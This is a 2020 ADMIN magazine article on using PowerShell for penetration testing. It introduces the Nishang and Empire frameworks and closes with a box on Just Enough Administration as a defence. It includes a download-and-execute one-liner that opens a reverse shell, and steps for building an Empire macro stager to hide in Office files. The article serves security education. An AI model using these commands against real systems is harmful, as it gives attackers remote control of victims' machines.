Lead Image © Freya Sapphire, Photocase.com

Lead Image © Freya Sapphire, Photocase.com

Stressing security with PowerShell

Impenetrable

Article from ADMIN 57/2020
By
PowerShell is not the usual go-to tool for pentesting, but it can reveal IT vulnerabilities that suggest a more considered use of the tool.

Windows PowerShell is more than just a preferred tool for administrators – it's ideal for penetration testing. To check a system thoroughly for vulnerabilities, pentesters need to assume the role of the attacker. With the help of native scripts by Nishang and Empire, known security gaps can be tested, the authorization level escalated, system information obtained, or the system damaged by malware.

Windows PowerShell (WPS) has been the standard tool of many system administrators for several years, providing both imperative (command chains with system instructions) and declarative (defined objectives such as Desired State Configuration) features. The idea of associating this tool with "hacking" because of its everyday use seems a little strange. However, it is the comprehensive conceptual design of PowerShell that makes it interesting for penetration tests. In security, the framework is mainly used in three areas: post-exploitation, infrastructure scanning and information gathering, and attacks over the communication structure.

Procedure and Tools of Attackers

Post-exploitation essentially refers to the operational phases after a victim's system has been compromised by the attacker. The value of the compromised system is determined by the data stored on it and its potential use for malicious purposes. Post-exploitation focuses on the information from the hacked system, which is available for further use within complex structures, especially networks. In this phase, the attacker collects confidential data to analyze configuration settings, network interfaces, and other communication channels. The information is used to maintain permanent access to the system in line with the attacker's requirements. The system can be compromised by exploiting existing vulnerabilities in the remote configuration, by social engineering, or by leveraging exploits in applications.

For the second phase of infiltration, hybrid frameworks consist of non-system-specific tools like Python and generated PowerShell scripts. The setup often relies on a Linux host with a configured web server that acts as the center for attack control. Although the structure is heterogeneous, these frameworks will hereafter be called "PowerShell Frameworks," because the transferred payload comprises PowerShell code.

The other existing form of PowerShell exploit applications is native scripts. Known vulnerabilities are tested to escalate the authorization level, grab system information, and even damage the system with malware. Frameworks such as Nishang [1] and Empire [2] are available for these objectives.

Running Malicious Scripts with Nishang

Nishang is an open source framework for creating powerful PowerShell scripts. Unlike Empire, which follows the hybrid approach, Nishang is a PowerShell-only application at its core. Nishang scripts are classified as malicious and blocked by many antivirus programs. Bypassing the defenses of Windows Defender or virus scanners is in itself an attack technique that shows that PowerShell scripts can also bypass restrictions. Windows Defender prevents direct execution of Nishang PowerShell files.

A conceivable platform for executing test scripts is a sandbox system, where the scripts can be run as binary code. As tools, specialized meta-frameworks are available on GitHub, PowerLine [3] being just one example. PS2EXE [4] also follows a similar approach, although with completely different administrative goals. Another option for executing PowerShell code is based on a volatile process space, wherein scripts are placed in memory on the target system. By in-memory downloading and execution of the PowerShell script, the remote scripts can be imported into the local session as a statement list, which transfers functions and variables to the current context:

PowerShell invoke-Expression (New-Object Net.WebClient).DownloadString("http://$companyWebServer/Invoke-PowerShellTcp.ps1");
Invoke-PowerShellTcp -Reverse -IPAddress $ipAddress -Port $PortNumber

The scripts themselves are divided into categories:

  • Information gathering
  • Infrastructure and system scanning
  • Authorization escalation
  • WMI and WinRM remoting modifications
  • Malicious code generation

After cloning the repository into a local directory, subdirectories are available for the various objectives of a penetration test. Within the subdirectories are PowerShell applications with concrete tasks and, in the client section, scripts for creating Excel (XLS), HTML Application (HTA), or Compiled HTML Help (CHM) file types with integrated malware. The comprehensive approach makes Nishang a good introduction to penetration testing with PowerShell. With no complex requirements for the test lab, access is facilitated.

Pentesting with Empire

The Empire framework provides an example of how to use a dedicated server as a platform for the test suite. If Empire is not available on the distribution you are using, you can install it manually. First, you need to create a project directory (e.g., /opt/projects) before enabling version control and cloning the sources:

cd /opt/projects
git init
git clone https://github.com/EmpireProject/Empire.git

The newly created Empire directory contains the Setup subdirectory. For the installation, you need to run setup.sh from this directory. Confirm the prompts shown by the routine by answering affirmatively. When you are done, you can launch the framework by typing sudo ./empire; exit closes the Empire console.

Before running any tests, it is worth taking a look at the structure of the framework:

  • A listener is a process that waits for an incoming connection from the machine. Empire uses this process to transfer specific payloads.
  • An agent is a persistent process that maintains a connection between the control center and the compromised host.
  • A stager is a snippet that allows malicious code to be executed by the agent on the compromised host.
  • A module encapsulates test-specific functions.

An integrated help feature, which you can call up in Empire with the help command, gives you a hand in managing the many modules. The listeners command takes you to the listeners management menu. Within the submenu, help is context-driven and refers to the listeners. Other useful commands in this submenu are shown in Table 1.

Table 1

Listeners Subcommands

Command Action
list Shows active listeners.
uselistener Starts new listener module.
usestager Initializes the stager.
agents Switches to the agents menu.
back or main Leads to the main menu.
exit Leaves Empire.
help Displays the help menu.
info Provides information about the active listener.
kill Ends a listener process.

Empire lets you create client-based tests with Office applications and hide framework-generated macros in unobtrusive Office files, as with Nishang. Creating the malicious code is easy from the Empire console window. The first step is to switch to the listener menu. You can complete the uselistener command with the Tab key, as shown in Figure 1. An existing listener, to which you can bind a new stager, must be active. Now create the macro with:

Figure 1: The uselistener http command lets you create a new listener from predefined modules.
usestager multi/macro http

After executing the info command, you will see the settings of the macro you just created. The execute command saves the snippet with the default settings in /tmp/macro. The script macro is displayed with cat /tmp/macro. Now you can copy the macro and hide it in an office file with the macro recorder.

Modules are the core of Empire. Analysis of functionality from the Empire console and the help menu opens a multitude of test possibilities against IT systems. This complexity makes the use of Empire worthwhile despite the costly creation of a test lab. Besides this use of PowerShell offensively, many approaches can minimize risks, including techniques for restricting the set of available PowerShell cmdlets and command containers (modules), for removing vulnerabilities in remote management, and ultimately, for restricting PowerShell from accessing .NET, Component Object Model (COM), and Windows Management Instrumentation (WMI) classes. (See also the "Just Enough Administration" box.)

Just Enough Administration

Administrative user accounts for managing computers and Active Directory items are often inflexible. Permissions are not tight enough and too far-reaching. Hijacking an account with administrative privileges poses a security risk. Entire server environments can be attacked.

Administrative permissions extend across entire domains. One problem is the lack of options for linking permissions with activities. The number of available roles is usually far fewer than the number of administrative tasks actually performed. This difference results in a discrepancy between assigned and required permissions. As a result, users often receive more rights than they actually need for their work.

Just Enough Administration (JEA) counters this with a granular role system. Membership in an administrative group is no longer required to carry out certain activities. PowerShell grants rights for specific role-based functions. The rights are valid during a PowerShell session and allow the execution of certain PowerShell commands.

JEA can be configured to allow non-administrators to execute commands that require administrative privileges. On the other hand, it is possible to grant users with administrative privileges minimum rights for certain tasks. In this way, you can precisely control what actions a user can perform on a computer. Settings are made through session definitions. The goal is to reduce the number of cmdlets and modules used.

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy ADMIN Magazine

SINGLE ISSUES
 
SUBSCRIPTIONS
 
TABLET & SMARTPHONE APPS
Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

comments powered by Disqus